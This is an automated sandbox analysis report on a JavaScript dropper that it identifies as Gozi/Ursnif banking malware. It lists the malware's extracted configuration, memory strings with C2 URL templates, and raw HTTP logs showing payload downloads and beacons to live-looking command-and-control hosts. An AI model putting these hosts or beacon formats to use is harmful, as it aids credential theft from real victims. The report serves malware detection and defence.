Loading ...

Play interactive tourEdit tour

Analysis Report view_attach_b8x.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:220434
Start date:06.04.2020
Start time:12:01:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:view_attach_b8x.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:4
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.bank.troj.spyw.evad.winJS@21/18@11/1
EGA Information:
  • Successful, ratio: 75%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 108
  • Number of non-executed functions: 259
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 104.127.51.68, 92.123.7.209, 152.199.19.161
  • Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, fs.microsoft.com, go.microsoft.com, ie9comview.vo.msecnd.net, go.microsoft.com.edgekey.net, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 3036 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Gozi Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Rundll321Credential Dumping1System Time Discovery1Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaRundll321Port MonitorsAccess Token Manipulation1Scripting2Network SniffingAccount Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesPowerShell1Accessibility FeaturesProcess Injection713Obfuscated Files or Information2Input CaptureSecurity Software Discovery1Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScripting2System FirmwareDLL Search Order HijackingMasquerading1Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol4SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExecution through API1Shortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationSystem Information Discovery35Shared WebrootData StagedScheduled TransferConnection Proxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceVirtualization/Sandbox Evasion2Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface12Path InterceptionScheduled TaskAccess Token Manipulation1Two-Factor Authentication InterceptionProcess Discovery3Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection713Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessDLL Side-Loading1Input PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationConnection Proxy1KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.1836.3.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "292", "system": "3f177153870006aaa3a6cdc80cbbbd11hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1586199788", "user": "31b341dd54c8a3b79c4b2eb51b2eaed4", "hash": "0x0d8e127a", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: f1.pipen.atVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: view_attach_b8x.jsVirustotal: Detection: 25%Perma Link
Source: view_attach_b8x.jsReversingLabs: Detection: 21%

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_0513CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_0514940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05138181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05138181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05147CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05147CDC

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/RIkBvjzuoO/tMqxDBrVTRrzfr2Kb/53ovMdf_2BCA/h995fSUlMdo/mc7eqDY3_2FUly/NReA6hyL_2FV7VwyiTH2m/chFe5dw2XLD7Exw9/UbJaKUC2eEkW1Ll/KhVmYcOAeOE1kz4rpz/Nx61A1y_2/BBExcKhQfVhooPPFgMXC/KGe1JMDBYsLsDjNJ5kE/_2F1q9hvtwlpsG9tLoReF_/2FdaXDC3_2Fwb/7xUJtaUu/408U_2B96WK1lQNUPZlg5RL/EdC1k8lvoE/E30Zy0LeZZ_0A_0DS/bMk9lb8_2B2u/syGKhXf2s4M/RVmwZMar5Fa7_2/FNe_2BbPgl0iqbFKC_2FC/jooaXJQUQ7ZTC_2F/2JA HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/HVRdgLc7ESeoGO/rk3SKwyodoNRYK1XctSAH/GYrAAtY4ZkkFA692/Qn14u_2BARgo8Tu/I8dmXhIQ29xTUqXhFl/bkQ_2FU9A/5N_2FzL4x9Nz0wpe6qXF/gDrJCHqY_2FjN0BTosv/F_2FeWEiU6MlwnYmiWfBKX/opcKmF8q_2FR8/xWQmdt_2/BnAs2Wz8d9SYUiNL_2B3Gbd/s1buuYLnXt/N_2FZdESw4_2FKqX8/uyJkgwopKgtO/BSG9rbiUF8z/X7_2Flh_2FnVMP/TsMBsmJMBZMdgn_0A_0Dv/xPKvEnSd7Nf_2FCR/ev4nPGVYBGH4tKa/t_2FcDdMCoRGBbSt38/poXUB1YthiK/79lXSr9bR3/J HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/cihLfcpMy/efzR22ZLuifw3CQ8_2Bs/P4VCpXGcJTnQBznbCOS/STSG_2FF4kbAq_2BhV6cEi/uFtqETcU4xGth/YAXmdKUb/sLPsBxxkPEG2bECnoEuC4Ol/YLnPia_2Fk/NQYEDs97KJCz6TrIM/w1LcDsZ1UWgf/Zr9p72JZzOk/qL0nBfStLTVDdm/rNZchFj_2BOpz2zhAwfnk/YNjDoDQV0SduZ0YM/Lb8VWk_2F9zbIuE/dAwcNPDyrsLjoKv_2B/mEbIe3JXU/FSzXNLV3j_0A_0DyAvrZ/N6x3r1kX_2B0Rcy9CsC/NwpnQ9GW36MfD_2BGzwf6C/_2FTXNJPf30Rk/67iPYmFkPfLB/QeN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: api10.dianer.at
Source: global trafficHTTP traffic detected: GET /api1/H0ewpgT_2/FnBXywvSbAU9lyenuBLR/ZhWxWshQc1ABmmbCvMT/pq_2FQ_2BYaXTrCIdi_2Bc/fLuWDjB53EPmd/uT8vyxAk/SYgwfhScACSnAcsPXpwiXe9/Ixqk9mZmFo/swnyYFV2usY5WO8aS/0gEWnGCWOtXV/sEVZ19dS2qh/XzjUA9i8vXHiMr/txs5LwugQEjLQObfnuSc3/6IfU_2BpNi0BsiG7/25kAq_2F0v1pIsQ/C3S5huGGtXap7NWUfB/Sc7KDmr3K/j7n3L6d_0A_0D1pclX1o/I7KdU_2F1RDsHP2o2qr/Dsm00_2FJda9ptbobJWcea/n3S HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Host: vv.malorun.at
Source: global trafficHTTP traffic detected: GET /api1/DSOyW32u0p/09xaC2PCkD_2BAlSq/AQZgOGEFGBwn/s8s6QgzsHUV/tnuTHdW6_2F4zs/w4k7w6mXiKWUYMCQTSBAD/9xAMtHwCmD5scw1P/fAWT3_2FMkX7Znm/3ZTEAwXpFCGHqTiolF/r4ZYt32K7/1G0T98uwXFz3FjN_2FgJ/Ng7nhnRkuoqkZ1xhO_2/FPEyghsFWMePg30vi83o4P/jZ45T_2BmZn42/za3j_2Fq/pKxHKUX3QeS7DdkIPwGSIv3/BJoH0PyKUo/NdtHotMK_0A_0DQlT/A5fi8Xw_2BIU/1piJNA2j9Be/2OfES2CnmL4N1PuIpyAnZX/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Host: vv.malorun.at
Source: global trafficHTTP traffic detected: GET /api1/sooKQ9PSB77euyrf4LISpR/66iyqY7TD5dm8/pw_2BoKy/wqT0N6RVnjtiKpgMBpOM_2B/3_2B0Wm9I3/04eO6uIei4KKIRL_2/F2xzdWEge882/j8E0slfhrD_/2FvtCHZHiWQXNh/UVOKKc_2FGuk7jcQ3O77L/U7mMgws0OvkqAKM5/4RQFS_2B0eq89Jt/ccWdUliXrZxUko2r_2/BRUyhl2QP/Bjlow02qkzZG2uM1G2xu/_2FRgqBWswlgCa4jfov/3wK3clPoZ_2FpGNkwbfZs_/2BBb_0A_0DYWI/XCDhGc7c/_2FuIVk_2BTIaPB3OV2nvzI/Se8aU0pl1dRA8Fd/yM HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Host: vv.malorun.at
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: f1.pipen.at
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /api1/2voe_2BiyW2Z7lZzdTQUp/h75WDPyTeR9cXeFO/xWRVODrX_2F3AuW/DoJI6_2F7sp3LyKJtr/leQAvTmod/P8_2B_2BHtjGRfBoWgoM/JpFo34sHeDTOnqStGcq/mWqLaNA_2BnFoNjGZl6_2F/idf4g5wEzlrWe/bOVfTl1N/uL05VLixDBmTG0YMHjZREy5/d0CH7FivQa/sUbDfXI_2Brye2tEc/4XkMMTm3A_2B/Cm1ZTQnDD9Y/lbbKXepaciRNXT/zaotExxjaBMXh5WEQvS5n/A_0A_0DoH7YTAB_2/BrIwtOS2W0tlBBX/QOKs2oR3st6st3uXGA/T3a776G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Content-Length: 2Host: vv.malorun.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Apr 2020 10:03:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary dataShow sources
Source: regsvr32.exe, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000003.00000003.1010006875.00000000001C0000.00000004.00000001.sdmp, explorer.exe, 00000010.00000000.1136260424.0000000007C26000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/HVRdgLc7ESeoGO/rk3SKwyodoNRYK1XctSAH/GYrAAtY4ZkkFA692/Qn14u_2BARgo8Tu/I8dmXh
Source: explorer.exe, 00000010.00000000.1136260424.0000000007C26000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/RIkBvjzuoO/tMqxDBrVTRrzfr2Kb/53ovMdf_2BCA/h995fSUlMdo/mc7eqDY3_2FUly/NReA6hy
Source: explorer.exe, 00000010.00000000.1117047191.0000000001170000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000011.00000000.1152895092.000001F26D790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000013.00000000.1164781219.000002DB88060000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1184426981.000001C7D3990000.00000002.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/cihLfcpMy/efzR22ZLuifw3CQ8_2Bs/P4VCpXGcJTnQBznbCOS/STSG_2FF4kbAq_2BhV6c
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, regsvr32.exe, 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, control.exe, 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux9
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/y
Source: RuntimeBroker.exe, 00000013.00000000.1164001909.000002DB87ADC000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1Y
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.1135071006.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.1138152282.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: RuntimeBroker.exe, 00000014.00000002.1184016017.000001C7D346B000.00000004.00000001.sdmpString found in binary or memory: https://www.heise.de/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 3720, type: MEMORY
